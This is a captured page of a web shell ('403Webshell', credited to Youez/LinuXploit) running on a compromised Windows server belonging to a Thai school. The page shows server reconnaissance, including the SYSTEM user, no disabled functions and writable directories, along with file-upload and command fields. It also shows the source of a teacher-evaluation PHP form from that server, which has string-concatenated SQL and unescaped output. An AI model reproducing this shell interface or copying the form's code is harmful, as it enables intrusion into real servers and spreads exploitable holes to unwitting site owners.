403Webshell
Server IP : 104.21.80.248  /  Your IP : 172.71.28.156
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Inetpub/www/myschool/triamudom/check/id-plan/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /Inetpub/www/myschool/triamudom/check/id-plan/display_user_result.php
<?php
session_start();
$path = "../";
include ($path.'include/config_db.php');
include ($path.'include/class_db.php'); 
include ($path.'include/class_display.php'); 
include ($path.'include/function.php'); 
$CLASS['db']   = new db();
$CLASS['db']->connect(); 
$CLASS['disp']   = new display();
$db   = $CLASS['db']; 
$disp   = $CLASS['disp']; 


//--------------------ส่วนบนใช้สำหรับประกาศตัวแปรและ Config เท่านั้น----------------------------//
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>ระบบบันทึกแผนการพัฒนาตนเอง (ของครู)  โรงเรียนแกลง''วิทยสถาวร'' จังหวัดระยอง</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="stylesheet" href="images/cbcscbmenu.css" type="text/css" />
<link href="css/default.CSS" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="../ckeditor/ckeditor.js"></script>
</head>

<body>
<table width="988" height="100%" border="0" align="center" cellpadding="0" cellspacing="0">
  <tr>
    <td height="200" valign="top" bgcolor="#3882F6"><?php include("header.php");?></td>
  </tr>
  <tr>
    <td height="100%" align="center" valign="top" bgcolor="#FFFFFF"><table width="100%" height="100%" border="0" align="center" cellpadding="0" cellspacing="0">
      <tr>
        <td height="100%" align="center" valign="top">&nbsp;</td>
        <td width="1" align="center" valign="top" background="images/hdot.gif"></td>
        <td align="left" valign="top" bgcolor="#FFFFFF">&nbsp;</td>
      </tr>
      <tr>
        <td width="230" height="100%" align="center" valign="top"><?php include('com_left.php');?></td>
        <td width="1" align="center" valign="top" background="images/hdot.gif"></td>
        <td width="757" valign="top" bgcolor="#FFFFFF"><table width="100%" border="0" cellspacing="3" cellpadding="3">
          <tr>
            <td><a href="display_main.php"><img src="images/ebbtcbmenu1_0.gif" width="81" height="26" border="0" align="absmiddle" /></a></td>
          </tr>
        </table>
          <table width="98%" border="0" align="center" cellpadding="0" cellspacing="0">
		<form action="function_result_performance.php" method="post" enctype="multipart/form-data" name="user_detail">
		<?php 
			$sql_resultper = $db->query("select * from tb_result_performance where tb_teacher_id='".$_SESSION['sessionuser_id']."' ");
			$fetch_resultper = $db->fetch_array($sql_resultper);
		?>
          <tr>
            <td valign="top" bgcolor="#FFFFFF"><fieldset style="border-color:#03b4fe"><legend><div align="left"><strong>ผลที่เกิดจากการปฏิบัติหน้าที่ในตำแหน่งปัจจุบัน(ย้อนหลังไม่เกิน 2 ปี)</strong></div></legend>
              <table width="100%" border="0" cellspacing="2" cellpadding="5">
                <tr>
                  <td align="left" nowrap="nowrap" bgcolor="#FFFFFF"></td>
                  </tr>
                <tr bgcolor="#03b4fe">
                  <td align="left" nowrap="nowrap"><strong>1. ผลที่เกิดจากการจัดการเรียนรู้</strong></td>
                </tr>
                <tr bgcolor="#FFFFFF">
                  <td align="center" nowrap="nowrap"><textarea class="ckeditor" name="tb_result_performance1" id="tb_result_performance1"><?php print $fetch_resultper['tb_result_performance1'];?></textarea></td>
                </tr>
                <tr bgcolor="#03b4fe">
                  <td align="left" nowrap="nowrap"><strong>2. ผลที่เกิดจากการพัฒนาวิชาการ</strong></td>
                </tr>
                <tr bgcolor="#FFFFFF">
                  <td align="center" nowrap="nowrap"><textarea class="ckeditor" name="tb_result_performance2" id="tb_result_performance2"><?php print $fetch_resultper['tb_result_performance2'];?></textarea></td>
                </tr>
                
                <tr bgcolor="#03b4fe">
                  <td align="left" nowrap="nowrap"><strong>3. ผลที่เกิดกับผู้เรียน</strong></td>
                </tr>
                <tr bgcolor="#FFFFFF">
                  <td align="center" nowrap="nowrap"><textarea class="ckeditor" name="tb_result_performance3" id="tb_result_performance3"><?php print $fetch_resultper['tb_result_performance3'];?></textarea></td>
                </tr>
                
                <tr bgcolor="#03b4fe">
                  <td align="left" nowrap="nowrap"><strong>4. ผลที่เกิดกับสถานศึกษา</strong></td>
                </tr>
                <tr bgcolor="#FFFFFF">
                  <td align="center" nowrap="nowrap"><textarea class="ckeditor" name="tb_result_performance4" id="tb_result_performance4"><?php print $fetch_resultper['tb_result_performance4'];?></textarea></td>
                </tr>
                
                <tr bgcolor="#03b4fe">
                  <td align="left" nowrap="nowrap"><strong>5. ผลที่เกิดกับชุมชน</strong></td>
                </tr>
                <tr bgcolor="#FFFFFF">
                  <td align="center" nowrap="nowrap"><textarea class="ckeditor" name="tb_result_performance5" id="tb_result_performance5"><?php print $fetch_resultper['tb_result_performance5'];?></textarea></td>
                </tr>
              </table>
            </fieldset></td>
          </tr>
          <tr>
            <td align="center" valign="top" bgcolor="#FFFFFF">&nbsp;</td>
          </tr>
          <tr>
            <td align="center" valign="top" bgcolor="#FFFFFF"><input name="Submit" type="submit" value="บันทึกข้อมูล" /></td>
          </tr></form>
        </table></td>
      </tr>
      <tr>
        <td height="100%" align="center" valign="top">&nbsp;</td>
        <td width="1" align="center" valign="top" background="images/hdot.gif"></td>
        <td align="center" valign="top" bgcolor="#FFFFFF">&nbsp;</td>
      </tr>
    </table></td>
  </tr>
  <tr>
    <td height="50" valign="bottom"><?php include("footer.php");?></td>
  </tr>
</table>
</body>
</html>
<script type="text/javascript">
            CKEDITOR.replace( 'tb_result_performance1',{
					enterMode : CKEDITOR.ENTER_BR,
		            } );
            CKEDITOR.replace( 'tb_result_performance2',{
					enterMode : CKEDITOR.ENTER_BR,
		            } );
            CKEDITOR.replace( 'tb_result_performance3',{
					enterMode : CKEDITOR.ENTER_BR,
		            } );
            CKEDITOR.replace( 'tb_result_performance4',{
					enterMode : CKEDITOR.ENTER_BR,
		            } );
            CKEDITOR.replace( 'tb_result_performance5',{
					enterMode : CKEDITOR.ENTER_BR,
		            } );
</script>

Youez - 2016 - github.com/yon3zu
LinuXploit